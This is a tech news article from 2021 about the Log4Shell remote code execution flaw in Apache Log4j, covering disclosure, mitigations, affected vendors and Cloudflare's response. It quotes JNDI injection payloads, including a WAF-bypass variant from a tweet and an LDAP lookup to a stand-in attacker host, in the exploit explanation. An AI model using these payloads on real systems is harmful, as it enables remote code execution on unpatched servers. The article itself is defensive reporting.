Friday, March 31, 2023
  • Events
  • Interviews
  • Jobs
  • Opinion
  • Whitepapers
  • Podcasts
  • Web Hosting Directory
  • Login
  • Register
Cloud7 News
  • Cloud Computing
  • Web Hosting
  • Data Center
  • Linux
  • Cybersecurity
  • More
    • Software
    • Network/Internet
    • Hardware
    • Artificial Intelligence
    • Windows
    • Policy/Legislation
    • Blockchain
    • Troubleshooting
    • How-Tos
    • Articles
No Result
View All Result
Cloud7 News
  • Cloud Computing
  • Web Hosting
  • Data Center
  • Linux
  • Cybersecurity
  • More
    • Software
    • Network/Internet
    • Hardware
    • Artificial Intelligence
    • Windows
    • Policy/Legislation
    • Blockchain
    • Troubleshooting
    • How-Tos
    • Articles
No Result
View All Result
Cloud7 News
No Result
View All Result

Home > Cybersecurity > Zero-day Apache Log4j RCE vulnerability (Log4Shell) is being exploited

Zero-day Apache Log4j RCE vulnerability (Log4Shell) is being exploited

Security experts are warning users about a recently discovered RCE vulnerability (Log4Shell) in the Java logging library Apache Log4j.


Erdem Yasar Erdem Yasar
December 13, 2021
5 min read
Zero-day Java library vulnerability under attack

Security experts and CISA warn users about a newly discovered Zero-day vulnerability, that is currently being exploited. The vulnerability, first discovered in Minecraft, affects systems and services using Java logging library. It affects Apache Log4j between versions 2.0 and 2.14.1 which includes cloud applications. Researchers announced that it is easy to exploit the vulnerability and it allows remote code execution and access to servers.

Table of Contents

  • Started on December 1
  • Massive risk exposure
  • Cloudflare helps users with mitigation
  • How to exploit Log4j vulnerability?
  • Is your system vulnerable?

Started on December 1

Cyber security companies are also investigating the vulnerability. The vulnerability defined as CVE-2021-44228 has a base CVSS score of 10.0 which is a critical level. Cisco Talos published a blog post about the flaw and stated that the activity has begun on December 2. Matthew Prince, CEO of Cloudflare also tweeted about the incident and stated that the earliest evidence they could discover was on December 1. This means it was in the wild for at least 9 days before announced publicly, however the first evidence of mass exploitation happened after public disclosure.

The Apache team also published an advisory about the vulnerability. The developers announced that it is fixed in Log4j 2.15.0 and urged users to install the update. In the latest version, this behavior has been disabled by default. The team also stated that the vulnerability was discovered by Chen Zhaojun of Alibaba Cloud Security Team.

In Apache Log4j2 2.14.1 and older versions, JNDI features, which are used configuration, log messages, and parameters, can’t protect against attacker-controlled LDAP and other JNDI-related endpoints. It allows an unauthorized attacker, who can control log messages or log message parameters, to execute arbitrary code loaded from LDAP servers if message lookup substitution is enabled.

The team also announced that it can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true in releases 2.10 and older. And releases between 2.7 and 2.14.1, all PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m. For the releases between 2.0-beta9 and 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.


Massive risk exposure

The internet community created a list of manufacturers and components impacted by Log4j.

Manufacturer/Component Verified
Apple TRUE
Tencent TRUE
Steam TRUE
Twitter TRUE
Baidu TRUE
DIDI TRUE
JD TRUE
NetEase TRUE
CloudFlare TRUE
Amazon TRUE
Tesla TRUE
Apache Solr TRUE
Apache Druid TRUE
Apache Flink FALSE
Apache Struts2 TRUE
flume FALSE
dubbo FALSE
IBM Qradar SIEM TRUE
PaloAlto Panorama TRUE
Redis FALSE
logstash FALSE
ElasticSearch TRUE
kafka FALSE
ghidra TRUE
ghidra server TRUE
Minecraft TRUE
PulseSecure TRUE
UniFi TRUE
VMWare TRUE
Blender TRUE
Google TRUE
Webex TRUE
LinkedIn TRUE
VMWarevCenter TRUE
Speed camera LOL TRUE

Cloudflare helps users with mitigation

Cloudflare also sent the following email to its users. The company stated that it is using WAF to help Pro and Business customers to help with mitigation. Cloudflare is also deploying mitigation rules to protect free users.

Zero-day Java library vulnerability under attack 2

However, a Twitter user published an exploit that bypasses Cloudflare.

Log4j Cloudflare bypass :
${jndi:dns://aeutbj.example.com/ext}
${jndi:${lower:l}${lower:d}a${lower:p}://example.com/

other WAF : pic.twitter.com/f3Fi7E34TY

— H4x0r-DZ (@h4x0r_dz) December 11, 2021

How to exploit Log4j vulnerability?

Security researchers at LunaSec also published a blog post about the vulnerability. The LunaSec team shared the necessary steps to exploit the vulnerability. These 5 steps are:

  1. Data from the User gets sent to the server (via any protocol),
  2. The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker-controlled server),
  3. The log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via « Java Naming and Directory Interface » (JNDI),
  4. This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process,
  5. This injected payload triggers a second stage and allows an attacker to execute arbitrary code.

Is your system vulnerable?

Adil Soybali from Seccops Cyber ​​Security Technologies developed a tool, Log4j RCE Scanner allowing users to scan the URL list provided, including the subdomains of the domain name.

Related Stories

  • Two new vulnerabilities are found on Log4j, only one of them is fixed yet
  • CISA published an emergency directive for Log4j
  • Google joining the war against Log4j exploits
  • Hackers exploit Log4j to inject Monero miners, shifting from LDAP to RMI
  • A third, new Apache Log4j vulnerability is discovered
  • How to scan your server to detect Log4j (Log4Shell) vulnerability
  • The Log4j flaw is patched but it is still vulnerable
  • CISA published Log4j vulnerability guidance

See more Cybersecurity News

A comprehensive guide to understanding Cybersecurity: What is Cybersecurity?


Tags: Apache HTTP ServerJavaVulnerability
Erdem Yasar

Erdem Yasar

Erdem Yasar is a news editor at Cloud7. Erdem started his career by writing video game reviews in 2007 for PC World magazine while he was studying computer engineering. In the following years, he focused on software development with various programming languages. After his graduation, he continued to work as an editor for several major tech-related websites and magazines. During the 2010s, Erdem Yasar shifted his focus to cloud computing, hosting, and data centers as they were becoming more popular topics in the tech industry. Erdem Yasar also worked with various industry-leading tech companies as a content creator by writing blog posts and other articles. Prior to his role at Cloud7, Erdem was the managing editor of T3 Magazine.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

I agree to the Terms & Conditions and Privacy Policy.

Next Post
Mozilla appoints Kristen Trubey as Chief People Officer

Mozilla appoints Kristen Trubey as Chief People Officer

Related News

7 best practices and tools to use for Linux security

7 best practices and tools to use for Linux security

March 24, 2023 5:00 pm
CISA aims to identify vulnerabilities that attract ransomware

CISA aims to identify vulnerabilities that attract ransomware

March 22, 2023 2:10 pm
7 best cybersecurity schools

7 best cybersecurity schools

March 21, 2023 9:00 pm
Akamai researchers warn about the new HinataBot botnet

Akamai researchers warn about the new HinataBot botnet

March 20, 2023 6:10 pm
Get free daily newsletters from Cloud7 News Get the Cloud7 Newsletter
Select list(s):

Check your inbox or spam folder to confirm your subscription.

By subscribing, you agree to our
Copyright Policy and Privacy Policy

Get the free newsletter

Subscribe to receive the latest IT business updates straight to your inbox.

Select list(s):

Check your inbox or spam folder to confirm your subscription.

Recent News

  • IBM Cloud Direct Link now available on Cologix Access Marketplace
  • WordPress 6.2 “Dolphy” is now available
  • Vega Cloud guarantees minimum 10% savings on monthly cloud spend
  • [Event] Grab your DeveloperWeek Europe 2023 ticket free
  • How to get Linux ready for gaming

Cloud7 News
Cloud7 is a news source that publishes the latest news, reviews, comparisons, opinions, and exclusive interviews to help tech users of high-experience levels in the IT industry.

EXPLORE

  • Web Hosting
  • Cloud Computing
  • Data Center
  • Cybersecurity
  • Linux
  • Network/Internet
  • Software
  • Hardware
  • Artificial Intelligence
  • How-Tos
  • Troubleshooting

RESOURCES

  • Events
  • Interviews
  • Jobs
  • Opinion
  • Whitepapers
  • Podcasts
  • Web Hosting Directory

Get the Cloud7 Newsletter

Get FREE daily newsletters from Cloud7 delivering the latest news and reviews.

  • About Us
  • Privacy & Policy
  • Copyright Policy
  • Contact

© 2023, Cloud7 News. All rights reserved.

No Result
View All Result
  • Cloud Computing
  • Web Hosting
  • Data Center
  • Linux
  • Cybersecurity
  • More
    • Software
    • Network/Internet
    • Hardware
    • Artificial Intelligence
    • Windows
    • Policy/Legislation
    • Blockchain
    • Troubleshooting
    • How-Tos
    • Articles
  • Events
  • Interviews
  • Jobs
  • Opinion
  • Whitepapers
  • Podcasts
  • Web Hosting Directory

© 2023, Cloud7 News. All rights reserved.

Welcome Back!

Sign In with Facebook
Sign In with Google
Sign In with Linked In
OR

Login to your account below

Forgotten Password? Sign Up

Create New Account!

Sign Up with Facebook
Sign Up with Google
Sign Up with Linked In
OR

Fill the forms below to register

*By registering into our website, you agree to the Terms & Conditions and Privacy Policy.
All fields are required. Log In

Retrieve your password

Please enter your username or email address to reset your password.

Log In

Add New Playlist

This website uses cookies. By continuing to use this website you are giving consent to cookies being used. Visit our Privacy and Cookie Policy.